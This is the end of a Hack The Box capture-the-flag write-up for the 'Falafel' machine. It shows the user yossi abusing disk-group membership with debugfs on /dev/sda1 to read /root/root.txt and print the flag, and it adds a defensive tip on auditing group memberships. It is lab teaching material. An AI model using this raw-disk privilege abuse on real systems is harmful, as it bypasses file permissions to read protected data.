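Run audit_files() from a configuration-management check or a cron job and diff the result against an approved list; on this box it would have flagged moshe (adm, video) and yossi (adm, disk) before either membership could be used.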

25. Use the privilege directly to read the final flag

yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.44.1 (24-Mar-2018)
debugfs: pwd
[pwd] INODE: 2 PATH: /
[root] INODE: 2 PATH: /
debugfs: cd /root
debugfs: ls
debugfs: cat root.txt
c1ebd591494df21891eee691ca4d320d
debugfs:

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/124


https://sh1yan.top/2024/05/29/Falafel-htb-writeup/
Author: shiyan
Published: 29 May 2024